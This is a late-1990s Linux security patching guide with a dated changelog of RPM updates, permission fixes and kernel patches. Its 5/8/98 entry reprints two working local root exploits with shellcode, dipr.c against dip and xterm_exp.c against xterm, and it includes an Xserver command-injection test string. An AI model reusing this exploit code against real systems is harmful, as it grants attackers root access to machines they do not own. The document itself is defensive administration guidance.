All users should apply patches to their respective Linux installation:
1. upon the first time the machine is installed
2. at least every week after that to stay ontop of the newest bug and security fixes
To find out what are the current security issues with Linux, etc, check out the Security URLs in Section 5
--- --- ---
NOTE: This is where Redhat RPMs, and Debian upgrade files really shine and blow away Slackware .PKG files!
NOTE #2: Be careful of where you download your newer versions of source code, RPMs, etc. Recently, ftp://win.tue.nl was hacked and the hackers put trojan'ed versions of TCP-wrappers and Linux-utils on their site. Because of this, many user's passwords were sent to the hacker's email address, etc. Not good.
In the future, I will cover how to verify the package's authenticity with PGP.
Redhat users: Depending on when you purchased your CD, your CD might already have these RPMs installed so if it says the RPM is already installed, just skip it.
************************* ** Be cautious with RPMs ** Before you blindly start installing new patch RPMs or even new software in RPM form, you really should (quickly) inspect the RPM archive to make sure it looks ok. For example, lets say you are going to install a new Sendmail RPM:
First, download the new Sendmail RPM file and put it to some location for future reference. I personally put all files in /usr/src/archive as described in the top of Section 5
Now show the RPM creator's notes:
rpm -qip sendmail-*.i386.rpm
Show the RPM's file contents:
rpm -qlp sendmail-*.i386.rpm | more
- Next, if you already have an older Sendmail RPM installed, make sure that the new RPMs won't clober your old configuration files:
rpm -Uv --test sendmail-*.i386.rpm
For even more info (I'd recommend it), do:
rpm -Uvv --test sendmail-*.i386.rpm
- With a little cautious looking, you'll know what will happen if you install this new RPM. Ok?
If the new Sendmail installation is going to copy over your original files, the RPM will -usually- make a backup of your configuration files and add a ".rpmsave" to it.
*** ******************************
Redhat users #2: I have noticed that the "rpm" program will crash (coredump) about 60% of the way through a wildcard (*.rpm) RPM upgrade process. You should be able to safely figure out what patches it failed to install and do them manually or by doing the following:
Say that the RPM program died while doing patching in the letter range (Q). So, do this to install all patches from Q to Z.
"rpm -Uvh [q-zQ-Z].rpm
************************ ** Patching your Redhat system ** Now, to find out if any new RPM files exist for Redhat, go to http://www.redhat.com/support/docs/errata.html and then look at the upper right-hand corner's date. If this date is NEWER than the 00readme.errata file, then there are newer RPMs.
Their documentation system read SUCKS in terms of though there might be a NEWER RPM for Glibc, they mearly update the DATE in the previous Gblic errata entry. Lame eh? So, you will have to page though the different errata listing to find what newer-date entries have been added.
*** ******************************
---- Various RPMs, permission fixes, etc...
- Fix BRU if it is installed:
chmod 1777 /usr/local/lib/bru (assuming root login)
or
My /usr/local/lib/bru directory is 775, works fine (as expected) from root.
great Security URLS:
ftp://ftp.win.tue.nl/pub/security
sendmail: 8.8.6.1
KSR[T] Advisory #003
Date: Aug 05, 1997
ID #: lin-cron-003
Operating System(s): Redhat linux 4.1, SuSE Linux 5.0, Slackware 3.3
Affected Program: updatedb / crontabs
Syn Attack logs:
http://www.whitefang.com/synlog.html
IP filtering:
ftp://ietf.org/internet-drafts/draft-ferguson-ingress-filtering-03.txt
CRON exploit:
ftp://ftp.freesoftware.com/pub/linux/slackware-3.4/slakware/a2/bin.tgz
psaux:
The Quick fix: chmod 660 /dev/psaux
2/9/98: Xkb
1. as usual chmod u-s,g-s all installed Xserver binaries (*)
Quick vulnerability check
$ Xserver -xkbdir ':;id > /tmp/I_WAS_HERE;'
[exit X server]
$ grep root /tmp/I_WAS_HERE && echo 'Gotcha!'
* remove setuid/setgid bit from all installed Xservers
* use xdm or a safe setuid wrapper to start Xserver
2/9/98: Device Dos
ls -l /dev/* | grep "r-- "
chmod ;)
2/9/98: Upgrade to ld.so v1.9.5 or better..
2/9/98: The patch corrects the coredump error in both imapd and ipop3d (the pine
version of pop3 server). Patch is against pine 3.96
diff -ru log_lnx.c.orig
log_lnx.c
--- log_lnx.c.orig Tue May 2 00:08:20 1995
+++ log_lnx.c Thu Feb 5 08:49:31 1998
@@ -55,7 +55,8 @@
/* allow case-independent match */
if (!pw) pw = getpwnam (lcase (strcpy (tmp,user)));
/* no entry for this user or root */
- if (!(pw && pw->pw_uid)) return NIL;
+ if (!(pw)) return NIL;
+ if (!(pw->pw_uid)) return NIL;
if(!(spw = getspnam (pw->pw_name))) return NIL;
/* validate password */
if (strcmp (spw->sp_pwdp,(char *) pw_encrypt(pass,spw->sp_pwdp))) return NIL;
2/9/98 chmod 700 /dev/zero
Date: Fri, 6 Feb 1998 07:59:46 +0100
2/9/98 Xconfigurator issue (if installed)
chmod 700 Xconfigurator
Date: Fri, 6 Feb 1998 07:59:46 +0100
2/9/98 Remove all old versions of /lib/libc.so.x
2/9/98 Upgrade linux-ld.so.x
4/6/98 Security
"chmod 700" the following files:
/tmp overwrite exploit
/sbin/Liloconfig (already good permissions)
/sbin/pkgtool.tty and /usr/lib/setup.cpkgtool (fixed)
/sbin/makebootdisk (fixed)
/sbin/netconfig.tty and netconfig.color (fixed)
4/19/98:
Here is a patch for the "Off by one IP header bug. Put the following into
a file (ie: offbyone.patch) in /usr/src/linux and apply it by running
"patch -p1 < offbyone.patch".
[This is FIXED in 2.0.35]
--<begin>--
--- ip_fragment.c.old Thu Apr 16 12:25:34 1998
+++ ip_fragment.c Thu Apr 16 12:29:02 1998
@@ -375,7 +375,7 @@
fp = qp->fragments;
while(fp != NULL)
{
- if (fp->len < 0 || count+fp->len > skb->len)
+ if (fp->len < 0 || fp->offset+qp->ihlen+fp->len > skb->len)
{
NETDEBUG(printk("Invalid fragment list: Fragment over size.\n"));
ip_free(qp);
--<end>--
Now, re-compile the kernel, move the kernel to /boot, update the /etc/lilo.conf
file, re-run "lilo", and reboot.
4/22/98:
[linux-security] SECURITY: procps 1.2.7 fixes security hole
5/8/98:
Dip and Xterm exploits:
The following code causes a buffer overrun in dip-3.3.7o that
comes with linux slakware version 3.4 and maybe others.
It can give you root permission if dip file is owned by root and
set-user-id bit is set.
This problem was mentioned in this list some days ago by Goran Gajic,
and he has also posted some possible ways to correct it.
The code is too messy... but it works.
Regards,
zef
------------------------------ dipr.c -----------------------------
/*
* dip-3.3.7o buffer overrun 07 May 1998
*
* sintax: ./dipr <offset>
*
*
* offset: try increments of 50 between 1500 and 3000
*
* tested in linux with dip version 3.3.7o (slak 3.4).
*
* by zef and r00t @promisc.net
*
* http://www.promisc.net
*/
#include <stdio.h>
#include <stdlib.h>
static inline getesp()
{
__asm__(" movl %esp,%eax ");
}
main(int argc, char **argv)
{
int jump,i,n;
unsigned long xaddr;
char *cmd[5], buf[4096];
char code[] =
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/bin/sh";
jump=atoi(argv[1]);
for (i=0;i<68;i++)
buf[i]=0x41;
for (n=0,i=68;i<113;i++)
buf[i]=code[n++];
xaddr=getesp()+jump;
buf[i]=xaddr & 0xff;
buf[i+1]=(xaddr >> 8) & 0xff;
buf[i+2]=(xaddr >> 16) & 0xff;
buf[i+3]=(xaddr >> 24) & 0xff;
buf[i+4]=xaddr & 0xff;
buf[i+5]=(xaddr >> 8) & 0xff;
buf[i+6]=(xaddr >> 16) & 0xff;
buf[i+6]=(xaddr >> 16) & 0xff;
buf[i+7]=(xaddr >> 24) & 0xff;
cmd[0]=malloc(17);
strcpy(cmd[0],"/sbin/dip-3.3.7o");
cmd[1]=malloc(3);
strcpy(cmd[1],"-k");
cmd[2]=malloc(3);
strcpy(cmd[2],"-l");
cmd[3]=buf;
cmd[4]=NULL;
execve(cmd[0],cmd,NULL);
}
------------------------------- end -------------------------------
Shell script for easy testing :-)
---------------------------- dipr.test ----------------------------
#/bin/bash
if [ ! -x /sbin/dip-3.3.7o ]
then
echo "could not find file \"/sbin/dip-3.3.7o\"";
exit -1
fi
if [ ! -u /sbin/dip-3.3.7o ]
then
echo "dip executable is not suid"
exit -1
fi
if [ ! -x ./dipr ]
then
echo "could not find file \"./dipr\"";
echo "try compiling dipr.c"
exit -1
fi
x=2000
false
while [ $x -lt 3000 -a $? -ne 0 ]
fi
if [ ! -u /sbin/dip-3.3.7o ]
then
echo "dip executable is not suid"
exit -1
fi
if [ ! -x ./dipr ]
then
echo "could not find file \"./dipr\"";
echo "try compiling dipr.c"
exit -1
fi
x=2000
false
while [ $x -lt 3000 -a $? -ne 0 ]
do
echo offset=$x
x=$[x+50]
./dipr $x
done
rm -f core
------------------------------- end -------------------------------
Approved-By: aleph1@NATIONWIDE.NET
X-Sender: andrea@dragon.bogus
X-Public-Key-URL: http://www-linux.deis.unibo.it/~mirror/aa.asc
Date: Fri, 8 May 1998 16:50:05 +0200
Reply-To: Andrea Arcangeli <arcangeli@MBOX.QUEEN.IT>
Sender: Bugtraq List <BUGTRAQ@NETSPACE.ORG>
From: Andrea Arcangeli <arcangeli@MBOX.QUEEN.IT>
Subject: xterm exploit [TOG issue]
To: BUGTRAQ@NETSPACE.ORG
/*
xterm_exp.c : linux/x86 xterm.Xaw exploit
by alcuin - 5/4/98 - [ http://www.rootshell.com/ ]
It works against both Xaw and neXtaw widgets
NB: you have to cp ~/.Xdefaults.old ~/.Xdefaults to be able to
use xterm again.
*/
#include <stdlib.h>
#include <stdio.h>
#include <ctype.h>
unsigned int getsp() {
asm("mov %esp,%eax");
}
inline rootshell(){
__asm__(
"movb $0x56, %al\n\t"
"l1:cmpb $0x12, %al\n\t"
"je l2\n\t"
"movb $0x12,%al\n\t"
"call l1\n\t"
"l2:pop %esi\n\t"
"xorl %eax,%eax\n\t"
"movb $0x25, %al\n\t"
"addl %eax,%esi\n\t"
"movl %esi,%ebx\n\t"
"movl %esi,%edi\n\t"
"movb $8,%al\n\t"
"addl %eax,%edi\n\t"
"movb $5,%al\n\t"
"addl %eax,%esi\n\t"
"movl %esi,(%edi)\n\t"
"movl %edi,%ecx\n\t"
"incl %edi\n\t"
"incl %edi\n\t"
"incl %edi\n\t"
"incl %edi\n\t"
"xorb %al,%al\n\t"
"movl %eax,(%edi)\n\t"
"movl %edi,%edx\n\t"
"movb $0xb,%al\n\t"
"int $0x80\n\t"
".string \"/bin/sh\"\n"
);
}
#define CONFFILE ".Xdefaults"
#define OLDFILE ".Xdefaults.old"
#define NEWFILE ".Xdefaults.new"
main (int argc, char **argv) {
char *home;
FILE *f_in, *f_out;
char buf[16384];
char shellbuf[16384];
char *s;
int i;
unsigned int sp=getsp();
if (home = getenv("HOME")) chdir(home);
if (!(f_out = fopen(NEWFILE, "w"))) {
perror("fopen");
exit(1);
}
if (f_in = fopen(CONFFILE, "r")) {
fseek(f_in,0,SEEK_SET);
while (!feof(f_in)) {
fgets(buf,16384,f_in);
for (s=buf;isblank(*s);s++);
if (strncmp(s,"xterm*inputMethod",17)<0)
fputs(buf,f_out);
}
fclose(f_in);
}
/* fill the buffer with nops */
memset(shellbuf, 0x90, sizeof(shellbuf));
shellbuf[sizeof(shellbuf)-1] = 0;
/* write the return adress */
s = shellbuf+2052;
*(int *)s=sp+0x69F5;
/* write the root shell code */
s = shellbuf+2800;
strcpy(s,(char*)rootshell);
fputs("xterm*inputMethod:",f_out);
fputs(shellbuf, f_out);
fclose(f_out);
system("/bin/cp "CONFFILE" "OLDFILE);
system("/bin/mv -f "NEWFILE" "CONFFILE);
execl("/usr/X11R6/bin/xterm","xterm",NULL);
}
I can' t reproduce the problem with the latest Debian compiled XFree86:
andrea@dragon:~$ dpkg -l xbase
Desired=Unknown/Install/Remove/Purge
| Status=Not/Installed/Config-files/Unpacked/Failed-config/Half-installed
|/ Err?=(none)/Hold/Reinst-required/X=both-problems (Status,Err: uppercase=bad)
||/ Name Version Description
+++-===============-==============-============================================
ii xbase 3.3.2-4 local clients and configuration required by
Andrea[s] Arcangeli
----
=======================================================================
See the updated master RPM guide at the TOP of this section
=======================================================================
Applied the following patches on 5/30/98:
rpm -Uvh --force --nodeps rpm-2.5.1-1.i386.rpm
rpm -Uvh glibc-2.0.7-13.i386.rpm
rpm -Uvh glibc-devel-2.0.7-13.i386.rpm
Applied the following on 6/1/98 to fix the --nodep issue:
rpm -Uvh patch-2.5.2.i386.rpm
6/13/98 - SSH 1.2.25 update. There is a new SSH exploit that requires
that users upgrade to 1.2.25 ASAP!!!! See the SSH chapter,
section 29, for URLs.
6/15/98 - installed bootp, metamail, dhcpcd, minicom, dhcp, xscreensaver,
findutils, X11, mailx RPMS
6/20/98 - Changed permissions of /usr/bin/lpr to (chmod 700 /usr/bin/lpr) due
to some security issues.
7/1/98 - Changed the permissions of /usr/X11R6/bin/seyon to (chmod 700) due
to security issues
7/4/09 - implemented the new RPMs for:
slang
libtermcap
rpm
I *SKIPPED* the Tin upgrade since I installed Tin v1.4beta.
I *SKIPPED* the Bind v4.9.x upgrade since I'm running Bind 8.1.2T3
7/8/98 - implemented the new dosemu-0.66.7-7.i386.rpm and libtermcap-2.0.8-9.i386.rpm
fixes.
7/13/98 - implemented the new samba-1.9.18p7-2.i386.rpm RPM due to security issues
7/14/98 - Just after Pine 4.00 was released, we were made aware of a security
problem with the imapd server that is included in the Pine 4.00
distribution. This will be fixed in the Pine 4.01 maintenance release, but
in the mean time, if you are using the UW IMAP server, please update it
with the following distribution:
ftp://ftp.cac.washington.edu/mail/imap.tar.Z
We don't have new imapd binaries available yet.
Pine itself is not affected.
7/28/98 - implemented the following RPMs:
NOTE: Upon installation of the initscripts RPM, you will need to
re-do ALL network optimizations from [Section 16]
+ ncurses-1.9.9e-9.i386.rpm
+ ncurses-devel-1.9.9e-9.i386.rpm
+ imap-4.1.final-1.i386.rpm
(installed the RPM though TrinityOS disables IMAP)
+ elm-2.4.25-14.i386.rpm
+ glibc-2.0.7-19.i386.rpm
+ glibc-debug-2.0.7-19.i386.rpm
+ glibc-devel-2.0.7-19.i386.rpm
+ glibc-profile-2.0.7-19.i386.rpm
+ Xconfigurator-3.26.1-1.i386.rpm
+ initscripts-3.67-1.i386.rpm
This RPM changes the following files but it makes backups
of your old files:
/etc/ppp/ip-up
/etc/rc.d/rc.sysinit
/sbin/ifup
+ modutils-2.1.85-4.i386.rpm
+ findutils-4.1-24.i386.rpm
- Removed SUID bit from the /usr/bin/dumpreg program due to a
kernel crash issue
chmod 755 /usr/bin/dumpreg
8/8/98 - implemented the following RPMs:
+ mutt-0.91.1-5.i386.rpm
+ SysVinit-2.74-4.i386.rpm
8/11/98 - implemented the apache-1.2.6-5.i386.rpm RPM
NOTE: If you are NOT using apache yet but still installed the
RPM, you will start getting Log Rotate errors. To fix this,
do the following:
mkdir /etc/logrotate.d.disabled
mv /etc/logrotate.d/apache /etc/logrotate.d.disabled/apache
8/17/98 - implemented the svgalib-1.2.13-5.i386.rpm to fix a console DoS.
8/22/98 - implemented the LinuxConf linuxconf-1.11r19-1.i386.rpm
RPM to fix a /tmp DoS hack for Redhat 5.1+ distributions
8/28/98 - implemented the nfs-server-2.2beta29-7.i386.rpm and
nfs-server-clients-2.2beta29-7.i386.rpm patches to fix NFS (again..)
8/31/98 - There is a buffer overflow DoS attack on Minicom, to fix this,
run "chmod 700 /usr/sbin/minicom"
9/20/98 - Installed the xscreensaver-2.27-1.i386.rpm to fix core dumps
with xlyap
10/10/98 - De-installed the following tools:
rpm -e fstool usercfg cabaret
I have also installed several other RPMs from Redhat's
update page. Please follow
10/31/98 - Installed
5.0 RPMS
+ bash-1.14.7-11.i386.rpm
+ imap-4.1.final-1.i386.rpm
+ netscape-navigator-4.06-2.i386.rpm
+ nfs-server-2.2beta29-7.i386.rpm
+ nfs-server-clients-2.2beta29-7.i386.rpm
+ pcmcia-cs-2.9.12-3.i386.rpm
+ rpm-2.5.3-5.0.i386.rpm
+ rpm-devel-2.5.3-5.0.i386.rpm
+ xscreensaver-2.27-1.i386.rpm
5.1 RPMs
+ fetchmail-4.5.3-1.i386.rpm
+ glint-2.6.1-1.i386.rpm
+ ispell-3.1.20-9.i386.rpm
+ man-1.5d-3.i386.rpm
+ xosview-1.5.1-4.i386.rpm
11/05/98 - Installed
+ svgalib-1.2.13-6.i386.rpm
+ svgalib-devel-1.2.13-6.i386.rpm
+ zgv-3.0-0.5.0.i386.rpm
11/13/98 - Installed
+ libc-5.3.12-28.i386.rpm
11/15/98 - Installed:
+ sysklogd-1.3-26.i386.rpm
+ samba-1.9.18p10-5.i386.rpm
12/01/98 - Disabled RZ and SZ due to the fact that LRZ creates files
of 0666 though the UMASK might be different.
chmod 700 /usr/bin/lrz
chmod 700 /usr/bin/lsz
12/17/98 - Added updated RPMs for issues with Netscape, FTP, Xwindows
netscape-common-4.08-1.i386.rpm
netscape-communicator-4.08-1.i386.rpm
netscape-navigator-4.08-1.i386.rpm
ftp-0.10-4.i386.rpm
XFree86-libs-3.3.3-1.i386.rpm
XFree86-3.3.3-1.i386.rpm
12/29/98 - Added 1 RPM
pam-0.64-4.i386.rpm
02/10/99 - Added 1 RPM to fix a root-compromise FTP bug
ftp://updates.redhat.com/5.2/i386/wu-ftpd-2.4.2b18-2.1.i386.rpm
NOTE: Though not included with Slackware or Redhat, ProFTPd which
comes with Debian Linux is vulnerable too. Upgrade to
version 1.2.0pre1-2 or better.
02/11/99 - There is a Lynx /tmp race and ALL versions of Lynx less than v2.8.1
are vulnerable. Until you update your Lynx code, DISABLE it:
chmod 700 /usr/bin/lynx
02/15/99 - The "Super" program, similar to "su" on Debian Linux has a root
exploit. Upgrate to at least v3.11.7.
ftp.onshore.com:/pub/mirror/software/super
02/17/99 - There is a root exploit against /usr/sbin/lsof. Change its
permissions to 0755
02/19/99 - Installed the lsof-4.40-1.i386.rpm to fix the security
issue announced on 2/17/99
- Debian has released the super_3.11.7-1.deb patch to fix the security
issues announced on 02/15/99
02/21/99 - Zgv has another exploit. Because of this, I recommend to make it
only root executable:
chmod 0500 /usr/bin/zgv
03/05/99 - There is a root exploit for GNUplot on SuSe distributions. For some
reason, SuSe installed this program SUID root. Fix this:
chmod 755 /usr/bin/gnuplot
03/20/99 - There is a security vunderability in Netscape 4.5.0's "talkback".
Netscape 4.51 has removed talkback .
Change its permissions via "/bin/chmod -R 600 /opt/netscape/talkback"
03/20/99 - There is a SuSE security issue with /proc/kmem
Change its permissions "/bin/chmod 640 /dev/kmem"
03/28/99 - There is a /tmp race condition that can overwrite files.
Until there is a new Xfree version posted, do the following:
/bin/rm -rf /tmp/.X11-unix
mkdir -p -m 1777 /tmp/.X11-unix
03/30/99 - There are are (4) new patches for Redhat but (2) of them are
dependant on the version of Redhat.
mutt-0.95.4us-0.i386.rpm
pine-3.96-7.1.i386.rpm
sysklogd-1.3.31-0.5.i386.rpm
zgv-3.0-1.5.0.i386.rpm
NOTE: There is a small bug with the sysklogd rpm. Please see ChangeLog
date 4/12/99 for more details.
04/19/99 - Installed (3) new RPMs for security reasons:
lpr-0.35-0.5.2.i386.rpm
procmail-3.13.1-1.i386.rpm
rsync-2.3.1-0.i386.rpm
05/03/99 - Older versions of Caldera might make the /etc/shadow file world readable.
Update your Coas tool to coas-1.0-8.i386.rpm
05/05/99 - There is a new Bugtraq exploit for Wu-FTP v2.4.2-Beta18 and below called "W00f".
Redhat hasn't released a new wu-ftp version so you'll need to install it yourself!
ftp://ftp.vr.net/pub/wu-ftpd/binaries/intel/linux/wu-ftpd-2.4.2-vr17-1.i386.rpm
06/1/99 - There is a Y2K issue with Timetool:
ftp://updates.redhat.com/5.2/noarch/timetool-2.5-4.noarch.rpm
- There is a problem with the newest Apache module for Perl CGIs
ftp://updates.redhat.com/5.2/i386/mod_perl-1.19-1.i386.rpm
6/04/99 - Redhat has updated their kernels in RH6.0 for a DoS issue.
ftp://updates.redhat.com/6.0/i386/kernel-2.2.5-22.i386.rpm
6/12/99 - Redhat has a new patch for RH6 to monitor stray processes
ftp://updates.redhat.com/6.0/i386/utempter-0.5-2.i386.rpm
- More fixes for the POP-3 protocol:
ftp://updates.redhat.com/5.2/i386/imap-4.5-0.5.2.i386.rpm
6/18/99 - Redhat released some patches for security issues with some
terminal progs on RH6.
dev-2.7.7-2.i386.rpm
rxvt-2.6.0-2.i386.rpm
screen-3.7.6-9.i386.rpm
- Redhat also has updated their entire Xwindow package for problem
fixes for the font server, race conditions, ISO-8859 char conflicts,
No Xauth authentication (ack!), and backspace keymapping issues:
XFree86-3.3.3.1-52.i386.rpm, XFree86-100dpi-fonts-3.3.3.1-52.i386.rpm
XFree86-75dpi-fonts-3.3.3.1-52.i386.rpm, XFree86-3DLabs-3.3.3.1-52.i386.rpm
XFree86-8514-3.3.3.1-52.i386.rpm, XFree86-AGX-3.3.3.1-52.i386.rpm
XFree86-FBDev-3.3.3.1-52.i386.rpm, XFree86-I128-3.3.3.1-52.i386.rpm
XFree86-Mach32-3.3.3.1-52.i386.rpm, XFree86-Mach64-3.3.3.1-52.i386.rpm
XFree86-Mach8-3.3.3.1-52.i386.rpm, XFree86-Mono-3.3.3.1-52.i386.rpm
XFree86-P9000-3.3.3.1-52.i386.rpm, XFree86-S3-3.3.3.1-52.i386.rpm
XFree86-S3V-3.3.3.1-52.i386.rpm, XFree86-SVGA-3.3.3.1-52.i386.rpm
XFree86-VGA16-3.3.3.1-52.i386.rpm, XFree86-W32-3.3.3.1-52.i386.rpm
XFree86-XF86Setup-3.3.3.1-52.i386.rpm, XFree86-Xnest-3.3.3.1-52.i386.rpm
XFree86-Xvfb-3.3.3.1-52.i386.rpm, XFree86-cyrillic-fonts-3.3.3.1-52.i386.rpm
XFree86-devel-3.3.3.1-52.i386.rpm, XFree86-doc-3.3.3.1-52.i386.rpm
XFree86-libs-3.3.3.1-52.i386.rpm, XFree86-xfs-3.3.3.1-52.i386.rpm
6/23/99 - Redhat has released a new patch set for KDE on RH6 to bring it to
release levels and it also fixes some security issues:
Intel: ftp://updates.redhat.com/6.0/i386/
kdeadmin-1.1.1-1.i386.rpm, kdebase-1.1.1-1.i386.rpm, kdegames-1.1.1-1.i386.rpm
kdegraphics-1.1.1-1.i386.rpm, kdelibs-1.1.1-1.i386.rpm, kdemultimedia-1.1.1-1.i386.rpm
kdenetwork-1.1.1-1.i386.rpm, kdesupport-1.1.1-1.i386.rpm, kdetoys-1.1.1-1.i386.rpm
kdeutils-1.1.1-1.i386.rpm, korganizer-1.1.1.i386.rpm
- Redhat has release new PHP modules for the Apache WWW server:
Intel: ftp://updates.redhat.com/6.0/i386/
mod_php3-3.0.9-1.i386.rpm, mod_php3-imap-3.0.9-1.i386.rpm, mod_php3-manual-3.0.9-1.i386.rpm
mod_php3-pgsql-3.0.9-1.i386.rpm
6/24/99 Redhat has released a new set of NFS server and client fixes.
nfs-server-2.2beta44.i386.rpm, nfs-server-clients2.2beta44.i386.rpm
Redhat has released a new nettools patch to fix security issues:
ftp://updates.redhat.com/6.0/i386/net-tools-1.52-2.i386.rpm
Redhat has released a new version of Talk to fix issues that they broke in RH6
ftp://updates.redhat.com/6.0/i386/talk-0.11-2.i386.rpm
Ack! This is a huge gap eh?
11/15/99 - There is a ROOT exploit against ALL versions of NAMED less than
8.2.2p5. Upgrade your BIND DNS server NOW!
11/19/99 - Added a Buffer overflow fix for NFS
nfs-server-2.2beta47-1.i386.rpm
nfs-server-clients-2.2beta47-1.i386.rpm
- Denial of service attack in syslogd
sysklogd-1.3.31-1.5.i386.rpm
12/09/99 - Debian reports a root overflow in htdig which is installed in v2.1 of the
distribution.
01/17/00 - Added (4) RPMs for security
Redhat 6.x: pam-0.68-10.i386.rpm
sharutils-4.2.1-1.6.1.i386.rpm
usermode-1.18-1.i386.rpm
All Redhat: lpr-0.48-0.5.2.i386.rpm